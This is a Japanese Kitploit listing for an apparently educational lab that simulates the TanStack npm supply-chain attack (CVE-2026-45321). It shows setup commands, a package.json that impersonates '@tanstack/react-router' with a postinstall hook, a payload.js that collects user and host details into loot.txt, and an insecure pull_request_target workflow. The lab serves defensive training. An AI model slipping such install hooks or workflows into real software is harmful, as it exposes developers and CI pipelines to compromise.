Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-45321-Tanstack — npmサプライチェーン攻撃、CI/CD悪用、CVE-2026-45321を介したインストール時のコード実行をシミュレートする教育用ラボ。ローカルの悪意のあるパッケージ展開による実践的な防御セキュリティトレーニング。 | Kitploit
ツール/GitHubGitHub/7whyex/cve-2026-45321-tanstack
脆弱性分析マルウェア分析サプライチェーンセキュリティ学習と教育ラボと実践
GitHub7whyex/cve-2026-45321-tanstack

CVE-2026-45321-Tanstack

npmサプライチェーン攻撃、CI/CD悪用、CVE-2026-45321を介したインストール時のコード実行をシミュレートする教育用ラボ。ローカルの悪意のあるパッケージ展開による実践的な防御セキュリティトレーニング。

リポジトリを見る
1ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Supply Chain Attack シミュレーション — CVE-2026-45321 (TanStack)

npmサプライチェーン攻撃、CI/CD悪用、インストール時コード実行の理解を目的とした教育用ラボ

免責事項

このプロジェクトは以下の目的でのみ作成されています:

  • サイバーセキュリティ学習
  • 防御的セキュリティ研究
  • ローカルラボシミュレーション
  • サプライチェーン攻撃の概念理解

このプロジェクトを以下の目的で使用しないでください:

  • 実際のシステムへの攻撃
  • 認証情報の窃取
  • マルウェアの展開
  • 不正アクセス
  • その他の違法行為

説明

このラボは以下のインシデントの基本概念をシミュレーションします:

  • CVE-2026-45321
  • TanStack npmサプライチェーン侵害
  • GitHub Actions CI/CD悪用
  • npmライフサイクルスクリプト実行

シミュレーションはローカルかつ安全に行われ、以下は含まれません:

  • 実際の認証情報窃取
  • トークンの外部流出
  • サードパーティサービスへの侵害

ラボ構成

root@kitploit:~
lab/
├── fake-repo/          # ターゲットリポジトリのシミュレーション
├── attacker-package/   # 悪意のあるパッケージのシミュレーション
└── victim-project/     # 被害者のシミュレーション

シミュレーションの仕組み

root@kitploit:~
攻撃者パッケージ
        ↓
npm install
        ↓
postinstallスクリプト実行
        ↓
payload.jsが自動実行
        ↓
被害者がインストール時実行の影響を受ける

学べる概念

  • npmライフサイクルフック
  • インストール時任意コード実行
  • サプライチェーン攻撃
  • CI/CD信頼境界
  • 悪意のあるnpmパッケージ
  • postinstall悪用
  • 依存関係侵害

インストール

1. リポジトリのクローン

root@kitploit:~
git clone https://github.com/renewablehacking/CVE-2026-45321-Tanstack.git

cd CVE-2026-45321-Tanstack

攻撃者パッケージのセットアップ

2. 攻撃者パッケージフォルダに移動

root@kitploit:~
cd attacker-package

3. 依存関係のインストール

root@kitploit:~
npm install

4. ターボールパッケージのビルド

root@kitploit:~
npm pack

結果:

root@kitploit:~
tanstack-react-router-1.169.5.tgz

被害者のシミュレーション

5. 被害者プロジェクトに移動

root@kitploit:~
cd ../victim-project

6. 悪意のあるパッケージをインストール

root@kitploit:~
npm install ../attacker-package/tanstack-react-router-1.169.5.tgz --foreground-scripts

出力

成功すると、以下のメッセージが表示されます:

root@kitploit:~
=== MALICIOUS PAYLOAD EXECUTED ===

また、以下のファイル:

root@kitploit:~
loot.txt

が自動的に作成されます。


payload.jsの例

root@kitploit:~
const os = require('os');
const fs = require('fs');

console.log("=== MALICIOUS PAYLOAD EXECUTED ===");

const info = `
USER=${process.env.USER}
HOST=${os.hostname()}
PLATFORM=${os.platform()}
`;

console.log(info);

fs.writeFileSync("loot.txt", info);

package.jsonの例

root@kitploit:~
{
  "name": "@tanstack/react-router",
  "version": "1.169.5",
  "scripts": {
    "postinstall": "node payload.js"
  }
}

CI/CDシミュレーション

このプロジェクトは以下の理解にも使用できます:

  • GitHub Actions
  • pull_request_target
  • CI/CD権限境界
  • 依存関係実行

ワークフローの例:

root@kitploit:~
name: CI

on:
  pull_request_target:

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4

      - run: npm install

CVE-2026-45321との関係

ラボシミュレーション実世界
attacker-package侵害されたTanStackパッケージ
payload.js悪意のあるインストーラ
postinstallライフサイクルフックの悪用

参照

  • https://nvd.nist.gov/vuln/detail/CVE-2026-45321
  • https://tanstack.com/blog/npm-supply-chain-compromise-postmortem
  • https://docs.npmjs.com/cli/v10/using-npm/scripts
  • https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions

教育目的のみ

このラボは以下の認識向上のために作成されています:

  • サプライチェーンセキュリティ
  • 依存関係セキュリティ
  • CI/CDセキュリティ
  • 防御的セキュリティ研究
ツールをダウンロード
victim-project
被害者となる開発者/CI
fake-repoGitHub Actionsパイプライン